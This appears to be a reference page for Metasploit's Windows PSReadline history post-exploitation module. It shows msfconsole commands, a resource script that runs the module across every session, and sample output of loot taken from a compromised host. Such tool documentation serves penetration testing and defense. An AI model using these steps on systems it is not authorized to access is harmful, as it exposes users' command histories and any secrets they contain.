Windows Gather PSReadline History - Metasploit


This page contains detailed information about how to use the post/windows/gather/psreadline_history metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather PSReadline History
Module: post/windows/gather/psreadline_history
Source code: modules/post/windows/gather/psreadline_history.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

Gathers Power Shell history data from the target machine.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/psreadline_history

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/psreadline_history
msf post(psreadline_history) > show options
    ... show and set options ...
msf post(psreadline_history) > set SESSION session-id
msf post(psreadline_history) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/psreadline_history")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This post-exploitation module will extract PowerShell history.

Verification Steps


  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use post/windows/gather/psreadline_history
  4. Do: set SESSION <session id>
  5. Do: run
  6. You should be able to see the extracted PowerShell history in the loot files

Options


  • SESSION - The session to run the module on.

Scenarios


Using the module with a version earlier than PowerShell 5.0

In this scenario the module won't be able to work, as in earlier versions of PowerShell, the history of the commands in the current session is not being saved after it is closed.

Using the module with PowerShell 5.0+

In this scenario the module will try to extract the history file and save it in a loot file.

  msf exploit(handler) > use post/windows/gather/psreadline_history 
  msf post(psreadline_history) > set SESSION 1
  SESSION => 1
  msf post(psreadline_history) > run

  [*] Writing history to loot...
  [*] PSReadline history file of user IEUser saved to /home/user/.msf4/loot/20181223050921_default_10.0.2.15_ps.history_688257.txt
  [*] Post module execution completed

The extracted history data would look like this:

  cd
  cls
  1+5
  Get-Help -Name Get-*
  Set-ExecutionPolicy Unrestricted
  Get-Service | Export-CSV c:\service.csv

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/psreadline_history post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/psreadline_history

msf6 post(windows/gather/psreadline_history) > show info

       Name: Windows Gather PSReadline History
     Module: post/windows/gather/psreadline_history
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Garvit Dewan <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  Gathers Power Shell history data from the target machine.

References:
  https://docs.microsoft.com/en-us/powershell/module/psreadline/
  https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py
  https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html

Module Options


This is a complete list of options available in the windows/gather/psreadline_history post exploitation module:

msf6 post(windows/gather/psreadline_history) > show options

Module options (post/windows/gather/psreadline_history):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/psreadline_history post exploitation module:

msf6 post(windows/gather/psreadline_history) > show advanced

Module advanced options (post/windows/gather/psreadline_history):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/psreadline_history module can do:

msf6 post(windows/gather/psreadline_history) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/psreadline_history post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/psreadline_history) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Garvit Dewan <d.garvit[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.